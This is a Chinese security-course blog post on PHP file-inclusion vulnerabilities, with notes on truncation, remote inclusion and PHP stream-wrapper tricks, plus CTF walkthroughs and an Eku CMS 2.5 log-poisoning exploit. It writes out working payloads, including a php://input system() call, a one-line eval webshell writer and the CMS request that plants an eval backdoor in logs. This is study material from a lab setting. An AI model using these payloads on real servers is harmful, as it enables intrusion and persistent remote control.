[小迪安全31天]php文件包含

最新推荐文章于 2021-12-03 19:37:48 发布
最新推荐文章于 2021-12-03 19:37:48 发布
阅读量767 收藏 5
点赞数 2
分类专栏: 小迪安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/117573092
版权

文件包含

文件包含

include.php
在这里插入图片描述
1.txt

<?phpinfo()?>

访问地址:127.0.0.1:8080/include.php?filenmae=1.txt
执行php效果
在这里插入图片描述

跨目录包含

在这里插入图片描述

受限制的包含

<?php
$file = $_GET['filename'];
include($file.".html");
?>

在这里插入图片描述
从报错信息得知在包含的文件后添加了.html
解决方法:

  1. 00截断 前提php版本小于5.3.4
    在这里插入图片描述

  2. 长度截断:条件:windows,点号需要长于256;linux 长于4096
    在这里插入图片描述

远程文件包含

在php.ini文件中allow_url_include设为on就开启远程包含
在这里插入图片描述
远程包含
在这里插入图片描述
远程包含绕过后缀添加.html
在这里插入图片描述
后缀添加?号
在这里插入图片描述

添加%23
在这里插入图片描述

文件包含伪协议玩法

文件读取
http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
在这里插入图片描述

执行系统命令
http://127.0.0.1:8080/include.php?filename=php://input Post:<?php system('ver')?>
写入一句话后门:<?PHP fputs(fopen('s.php','w'),'<?php @eval($_POST[cmd])?>’);?>
在这里插入图片描述

file协议读取文件
在这里插入图片描述

第二种执行代码:http://127.0.0.1:8080/include.php?filename=data://text/plain,<?php%20phpinfo();?>
在这里插入图片描述

南邮CTF文件包含

http://4.chinalover.sinaapp.com/web7/index.php?
在这里插入图片描述
根据名字判断可能是文件包含
在这里插入图片描述
直接文件读取伪协议
php://filter/convert.base64-encode/resource=index.php
在这里插入图片描述
base64解密,拿取flag
在这里插入图片描述

i春秋文件包含CTF

在这里插入图片描述
执行命令
在这里插入图片描述
读取文件:获取flag
在这里插入图片描述

易酷CMS本地文件包含

查询该CMS漏洞情况:

易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。

http://192.168.10.22/index.php?s=my/show/id/{~eval($_POST[x])} 写入日志文件一句话
在这里插入图片描述
本地日志文件就写入一句话
该日志是以时间日期命名的,用菜刀连接该日志文件,得到shell
http://192.168.10.22/index.php?s=my/show/id/…\temp\logs\21_06_6.log

道长在此
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
php 本地文件包含漏洞,PHPCMS V9 (plugin.php)本地文件包含漏洞
weixin_39815600的博客
03-24 470
由于文件/plugin.php对于用户提交的变量未过滤,导致本地文件包含漏洞的产生。相关代码如下:文件plugin.phpif(isset($_GET['id'])) {list($identification, $filename,$action) = explode('-', $_GET['id']);$filename = !empty($filename) ? $filename : $i...
PHP 配置文件详解(php.ini 详解 )
Superman_xing的博客
07-04 271
[PHP] ; PHP还是一个不断发展的工具,其功能还在不断地删减 ; 而php.ini的设置更改可以反映出相当的变化, ; 在使用新的PHP版本前,研究一下php.ini会有好处的 ;;;;;;;;;;;;;;;;;;; ; 关于这个文件 ; ;;;;;;;;;;;;;;;;;;; ; 这个文件控制了PHP许多方面的观点。为了让PHP读取这个文件,它必须被命名为 ; ...
php文件包含的几种方式和特点,php文件包含的几种方法
weixin_42169674的博客
03-19 263
四种语句PHP中有四个加载文件的语句:include、require、include_once、require_once。基本语法require:require函数一般放在PHP脚本的最前面,PHP执行前就会先读入require指定引入的文件包含并尝试执行引入的脚本文件。require的工作方式是提高PHP的执行效率,当它在同一个网页中解释过一次后,第二次便不会解释。但同样的,正因为它不会重复解...
小迪安全】Day30web漏洞-RCE代码及命令执行漏洞全解
qq_42665286的博客
11-24 785
小迪安全】Day30web漏洞-RCE代码及命令执行漏洞全解 在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 #代码执行 RCE 漏洞 原理,攻击,检测,危害,修复等 搭建靶场 —eval()函数作用,即get传递的参数(字符串)会当成PHP脚本执行 访问靶场 —发现传递的参数被当成PHP脚本执行 —
PHP 编程安全性小结
12-17
在采取措施确保安全之前,来自任何其他来源(比如 GET 变量、表单 POST、数据库、配置文件、会话变量或 cookie)的任何数据都是不可信任的。 对用户输入进行清理的一个简单方法是,使用正则表达式来处理它。 规则 2:...
02-PHP文件包含.zip
12-29
php文件上传 资料+笔记
PHP安全下载文件的方法
10-22
主要介绍了PHP安全下载文件的方法,涉及PHP文件的编码设置,转换,判断及下载的相关技巧,需要的朋友可以参考下
PHP临时文件安全性分析
10-25
主要介绍了PHP临时文件安全性分析,对于临时文件安全性及防范措施作出了比较详细的阐述,需要的朋友可以参考下
php 多线程上下文中安全文件实现代码
10-29
提供一个php多线程上下文中安全文件的实现方法。这个实现没有使用php 的file lock机制,使用的是临时文件机制。多线程中的各个线程都是对各自(每个线程独占一个)的临时文件写,然后再同步到原文件中。
易酷CMS v2.5
05-14
易酷免费影视系统V2.5 Final对比以往版本做了如下操作: 1、多分类批量处理 2、分页模板独立 3、后台视频管理可按播放器或者星级选择视频 4、采用友言社会化评论系统 5、后台生成显示当前状态 6、幻灯片支持分类调用 7、添加自定义采集资讯 8、common.php 加载 con_common.php 文件 9、模板自定义主目录(再不不担心模板被盗用了) 10、影片总数、今更新数量、昨更新、本周更新、本月更新 11、更多标签的支持完善 01、地区 02、年代 03、星级 04、字母 12、后台数据库密码"*"表示 13、详情页去除多余的关键字描述14
易酷CMS v2.5.zip
07-07
易酷免费影视系统V2.5 Final对比以往版本做了如下操作: 1、多分类批量处理 2、分页模板独立 3、后台视频管理可按播放器或者星级选择视频 4、采用友言社会化评论系统 5、后台生成显示当前状态 6、幻灯片支持分类调用 7、添加自定义采集资讯 8、common.php 加载 con_common.php 文件 9、模板自定义主目录(再不不担心模板被盗用了) 10、影片总数、今更新数量、昨更新、本周更新、本月更新 11、更多标签的支持完善 01、地区 02、年代 03、星级 04、字母 12、后台数据库密码"*"表示 13、详情页去除多余的关键字描述14、多分类名称可在标题栏显示 15、主演、导演的链接可独立调用 16、其它 易酷免费影视系统是一套专为不同需求的站长而设计的视频点播系统,灵活,方便是最大的特色,为初学者快速架设网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 易酷免费影视系统采用PHP MYSQL架构,国内优秀TP的框架为开发基础,其卓越的访问速度和负载能力免去您的后顾之优。 本着免费开源的宗旨、将易酷免费影视系统努力打造成为您身边最贴近的建站程序!不需要庞大的空间与高带宽;一个普通的虚拟空间就可以迅速搭建起一个内容丰富的视频、资讯网站,使你的建站成本低至极点! 现将易酷免费影视系统2.5的一些特性简要概述如下: 1:内核安全稳定(基于ThinkPhp框架开发/PHP MYSQL架构/Jquery类包/超强的负载能力与缓存/UTF8编码) 2:安装使用简单(一健安装/一键采集/一键备份/一键切换动静态模式/操作简便/灵活实用) 3:网站运营全面(支持免费点播/收费点播/QQ用户可直接登录/集成支付宝接口) 4:影片资源丰富(多播放器/多浏览器支持/百万集片库/24小时不间断更新/一键采集/自定义采集) 5:建站资源丰富(SEO优化模板免费下载/实用插件工具免费下载/完善的教程学习) 6:网站管理轻松(支持定时采集/定时生成/做最懒最赚钱的站长) 流量 7:SEO优化工具篇(百度,谷歌地图/rss订阅/单文件RSS聚合/TAG关键字聚合/专题编辑) 8:SEO优化模板篇(标签灵活调用/播放页每集静态标题描述/自定义常用标签/专题匹配/关联词匹配) 9:SEO优化路径篇(静态模式/伪静态模式/动态模式/自定义生成路径) 10:网站互动守住流量(评分/顶踩/评论/留言/会员等用来提升人气的模块可大幅提搞回头客留住流量) 变现 11:流量变现(自定义缓冲广告/内置广告模块/推荐流量互换/推荐广告联盟/友情链接交换)
php://filter(文件包含漏洞利用)
MIGENGKING的博客
10-12 8111
“网址+/index.php?page=php://filter/convert.base64-encode/resource=index.php“ 例如: http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 首先这是一个file关键字的ge...
【ctf】php://filter/read=convert.base64-encode/resource=
chualam的博客
11-03 3296
题目中flag在index里 打开后url有file= 发现index.php打开后没东西 于是就用到这个语句 这个语句的作用就是作为一个协议流的中间流 处理其他流 可以作为文件包含漏洞的攻击 至于为什么没有显示flag 肯定被注入掉了 这个协议还可以攻击一些php写入了exit导致无法连接菜刀的问题 把<>这些过滤掉 ...
谈一谈php://filter的妙用
热门推荐
beyond__devil的博客
10-19 1万+
原文地址: https://www.leavesongs.com/PENETRATION/php-filter-magic.html 这个可能是一个大牛,大家可以看看博客去,我没看过。。。 php://filter是PHP中独有的协议,利用这个协议可以创造很多“妙用”,本文说几个有意思的点,剩下的大家自己下去体会。本来本文的思路我上半年就准备拿来做XDCTF2016的题目的,
易酷CMS2.5本地文件包含漏洞复现
谢公子的博客
11-28 3287
易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞,让其包含日志文件,然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件,再用菜刀连接拿shell。 渗透之前的操作,比如先用后台扫描工具,扫描得到该网站的后台目录结构,才更好的进行后面的操作。 我们通过访问该url,将一句话木马写入日志文件中 http://192.168.1...
PHP文件包含与一句话木马实验代码
a2788656708的博客
12-03 2594
文件包含 1.新建phpinfo.php文件 2.用include语句包含phpinfo.php文件 3.浏览器访问 1.利用require 语句包含phpinfo.php文件 2.浏览器访问 一句话木马 ASSERT函数 1.利用assert函数创建get.php 2.浏览器访问 在url中 ip地址后输入 cmd=system("whoami"); 1.利用assert函数创建post.php 2.浏览器访问 在post data 栏 输入 ...
小迪安全--文件包含漏洞
wcwdnmdnmd的博客
10-02 1614
文件包含漏洞
引入flag.php文件,php文件包含的奇淫技巧
weixin_30072453的博客
03-10 1072
原标题:php文件包含的奇淫技巧前言刷题的时候刚好看到一个比较厉害的phpinfo的利用姿势,原理不是很懂,题目来自百度杯12月第四场Blog进阶版以下是writeup解题过程注册以后发现了一个编辑器,网上搜索一番,编辑器可以列目录:1http://931088e56a06460eb01b88a21186b77e156bc67ce775433a.changame.ichunqiu.com/kin...
php文件包含漏洞(利用phpinfo)
最新发布
06-28
回答1:</h3><br/>PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值